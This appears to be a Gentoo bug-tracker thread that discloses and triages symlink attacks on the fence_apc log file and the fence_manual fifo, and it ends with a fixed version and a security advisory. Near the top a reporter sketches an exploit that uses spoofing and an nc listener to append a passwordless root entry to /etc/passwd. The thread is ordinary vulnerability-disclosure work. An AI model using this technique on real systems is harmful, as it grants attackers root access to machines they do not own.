/usr/sbin/fence_apc logs to /tmp/apclog, if you use verbose mode:
./fence_apc -v -l foo -p bar -n 1 -a 192.168.0.1
it will write into that file.
a) link to /etc/passwd
b) redirect the connection (e.g. arp-spoof, dns-spoof)
you can do this on the host you redirected to:
echo "hacked::0:0:root:/root:/bin/bash" | nc -l -p 23
And the account will be appened in /etc/passwd.
Honestly I doubt that will ever happen in reality, but it's possible.
seems to be a completely updated version.
Seems there is also a hole in fence_manual / fence_ack_manual fifo handling, it's a different bug, but I guess we can fix both in this bug #.
The (1) fence_apc and (2) fence_apc_snmp programs, as used in (a)
fence 2.02.00-r1 and possibly (b) cman, when running in verbose mode,
allows local users to append to arbitrary files via a symlink attack
on the apclog temporary file.
fence_manual in fence allows local users to modify arbitrary files
via a symlink attack on the fence_manual.fifo temporary file.
ha-cluster: Looks like you did some bumping. Can you please ascertain/confirm whether this issue is fixed in your newer ebuilds?
(In reply to comment #4)
> ha-cluster: Looks like you did some bumping. Can you please ascertain/confirm
> whether this issue is fixed in your newer ebuilds?
I found this at the Debian bugtracker:
* New upstream release version 2.03.09.
- Upstream code audit fixes several tmpfile race conditions, among
them CVE-2008-4579 and CVE-2008-4580. (Closes: #496410)
We have that version in the tree, stabled, old versions are removed.
So, GLSA voting time!
Ready to vote, I vote YES.
What about you, a3li? ;)
There is no sys-cluster/fence in portage any more.
GLSA 201009-09, thanks everyone.